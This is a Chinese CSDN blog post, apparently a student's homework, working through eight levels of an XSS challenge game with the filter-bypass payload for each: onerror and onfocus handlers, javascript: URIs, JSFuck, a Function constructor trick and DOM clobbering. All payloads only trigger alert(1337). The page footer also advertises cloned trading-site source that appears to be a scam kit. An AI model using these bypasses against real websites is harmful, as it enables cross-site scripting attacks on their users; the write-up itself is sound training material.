渗透第三次作业

于 2024-08-18 00:50:16 发布
阅读量232 收藏 5
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75856990/article/details/141289705
版权

xss game前八关复现

第一关

a9f5ca38465a4a6caf0863c336b894f0.png

 传参进入h2标签

a85d75469304415186d25fb7c1c812f1.png

 传入一个alert(1)

34785675c2614d5e918aa99471a15960.png

 发现没有触发,原因是官方禁用了script

e58e84a1b2484215afecf8d894056c4d.png

 选择用img标签

?somebody=<img src=1 οnerrοr="alert(1337)">

08af46282754458fba6095cdd9ef0529.png

第二关

52da1b4dc1984a998e888da3aadec54f.png 

 先把它的双引号闭合掉,再执行1337再闭合

?jeff=111";alert(1337);"

c6dcf6b4e892463eb3d0dda13489ed81.png

 第三关

1ceadc81394a436ea77f8cb449267ff8.png

 使用onfocus焦点

5e94138aa840453aa9fc3331ca3038d4.png

 再添加一个autofocus自动聚焦

?wey=1111" οnfοcus=alert(1337) autofocus="

4340e36869a8401db90aec96f89b89e4.png

 第四关

ccc46d5671ff46d5a0cf83e5bc56f301.png

 action有一个提交执行,而且还有一个定时器2秒后自动提交

?ricardo=javascript:alert(1337)

6db96acd6e624eba8910bbc3860b4183.png

第五关

51a90b7cd66141ec9470c9992ea6c3b0.png 

 观察后发现需要用到location

?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281337%2529">

58aad077bb0043b09e75b9ae95cb22ad.png

第六关

9d2b7efda5c74357acb0652b88cc6b34.png 

 这道题过滤了数字,字母,选择进入jsfuck

c3b0534cba404769987714f4f6eff162.png

 urlcode编码(太长了就不复制了)

cb217fcff86540cf902114a743834b13.png

第七关

4cd9617564134165a049992f83436d35.png 

 这一题过滤了很多符号,还有函数名,所以使用构造函数,就是用大写后面接.source.toLowerCase()再转成小写

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

5123893303084379a891cc9eb0817db7.png

 第八关

0885892002204224aec93b9603d99d01.png

 观察发现基本无从下手,选择使用dom破坏

?boomer=<a id=ok href="javascript:alert(1337)">

c690b574623e4a02883101090d81ba65.png

 失败了,因为过滤框架把javascript过滤了,需要寻找白名单,使用未被过滤的

以下为白名单

22f7d0a820a44476978b4dd7da89e13d.png

 ?boomer=<a id=ok href="tel:alert(1337)">

99107819df64476b807b143b053fbb88.png

 

2201_75856990
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透第一次作业
2201_75885649的博客
05-06 408
思考题1. windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文2. 我们通过hashdump 抓取出 所有用户的密文,分为两个模块,为什么?这两个模块分别都代表什么3. 为什么第一个模块 永远是一样的aad34. 这两个模块的加密算法有什么不同,如何加密的。
渗透第二次作业
2301_78305580的博客
06-28 924
调用 exploit/multi/handler 模块,在该模块上配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。监听 IP 和端口设置成刚才 Metasploit Framework 上所监听的 IP 和端口,接着在 Cobalt Strike 上右击选择要传递的会话,找到 Spawn 选项,选择刚刚创建的监听器即可。使目标服务器中马后,我们就可以获取想要的东西了(这里就不演示了)
渗透测试第二次作业
jtmcq的博客
08-11 188
?
网络渗透第一次作业
qq_53188113的博客
10-11 859
等保2.0全称网络安全等级保护2.0制度,是我国网络安全领域的基本国策、基本制度。等级保护标准在1.0时代标准的基础上,注重主动防御,从被动防御到事前、事中、事后全流程的安全可信、动态感知和全面审计,实现了对传统信息系统、基础信息网络、云计算、大数据、物联网、移动互联网和工业控制信息系统等级保护对象的全覆盖。 等保2.0与1.0的不变之处: 等保2.0五个级别同等保1.0一样,依次是用户自主保护级、系统审计保护级、安全标志保护级、结构化保护级、访问验证保护级。 规定动作不变,分别为定级、备案、建设整改
网络渗透测试第二次作业
weixin_51561328的博客
10-26 291
@ TOC Wireshark初步认识 参考???? 介绍 Wireshark是非常流行的网络封包分析软件,可以截取各种网络数据包,并显示数据包详细信息。常用于开发测试过程各种问题定位。 WireShark 主要分为这几个界面 Display Filter(显示过滤器), 用于设置过滤条件进行数据包列表过滤。菜单路径:Analyze --> Display Filters。 2.Packet List Pane(数据包列表), 显示捕获到的数据包,每个数据包包含编号,时间戳,源地址,目标地址,协
渗透作业第一次
weixin_63032002的博客
04-26 254
这表明在某些情况下,为了保证系统的安全性或者出于对旧加密算法的不信任,系统可能会默认使用一个特定的值(如aad3)作为加密过程的一部分,即使这个值可能不是由用户输入或其他动态数据生成的。NTLM模块:这个模块代表的是NT LAN Manager,这是一种较早的加密方式,主要用于Windows NT/2000/XP等操作系统中的用户密码存储。1. windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文 ————这两个模块分别都代表什么 ————
网络渗透测试第3次作业
m0_75239462的博客
11-19 71
1、在虚拟机中安装,使用theHarvester工具。1、找到ZoomEye搜索引擎,注册登录。3、Shodan 网络空间设备搜索引擎。4、Censys 联网设备信息搜索引擎。(一)使用theHarvester工具。-c:对域名执行DNS蛮力。7、FOFA.so 网络空间搜索引擎。2、360 网络空间资产测绘。2、-b指定任意种搜索引擎。5、DNSdb搜索引擎。三、子域名收集,截图。(二)直接使用在线工具。
渗透的第一次作业
ISjjl的博客
01-26 444
渗透的第一次作业
渗透的第二次作业
ISjjl的博客
01-31 429
第二次作业
上海开放大学市场营销学第一次网上记分作业答案.zip
03-03
这次的“第一次网上记分作业答案”提供了深入探讨和学习市场营销学的机会。 在解答市场营销学的作业时,学生需要考虑以下几个核心概念: 1. 市场调研:这是了解消费者需求、竞争对手状况和行业趋势的基础。通过...
中石油北京20年春《国际营销》第三次在线作业标准答案.docx
10-24
15. 国际营销策略:新产品导入期可能采用的策略包括快速撇脂策略(B)、缓慢撇脂策略(C)、快速渗透策略(D)和缓慢渗透策略(E)。 16. 地理扩张策略:企业可以选择产品和促销直接延伸策略(A)、产品直接延伸、促销改变...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8424
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
全新转转交易猫自带客服多模板全开源完整定制版源码
08-27
定制版全开源完整无授权 商品发布; 请在后台商品添加成功后, 再点击该商品管理,可重新编辑当前商品的所有信息及配图以及支付等等相关信息 可点击分享或者跳转,将链接地址进行发布分享 请在手机端打开访问 访问商品主要模板文件路径目录 咸鱼; http://你的域名地址/Xianyu_goods/ 代练妈妈;http://你的域名地址/dlmm/ 大麦商品;http://你的域名地址/dm/dzpj.php 大麦售票;http://你的域名地址/dm/dzp.php 交易猫; http://你的域名地址/jym/ QQ卡框工具;http://你的域名地址/kk/ 京东; http://你的域名地址/www.jd.com/index1.php 转转;http:/ 安装教程; 环境; PHP版本5.6,数据库版本MySQL 5.6 第一步源码上传解压 第二步找到config文件夹找到Conn.php修改数据库 第三步导入数据库sql.sql 第四步http://域名/wuyun.php登录后台 默认登录后台账号及密码; 默认账号;admin 默认密码;123456 源码内附详细搭建教程TXT文档
项目模板-硬件详细设计说明书.doc
最新发布
08-27
项目模板-硬件详细设计说明书.doc
深入探索MySQL的存储引擎:数据持久化的奥秘
08-27
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
ESXI后台导出虚机模板工具
08-27
ESXI后台导出虚机模板工具
使用c语言来实现如果cmd中的ping
08-27
c语言实现如果cmd中的ping
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值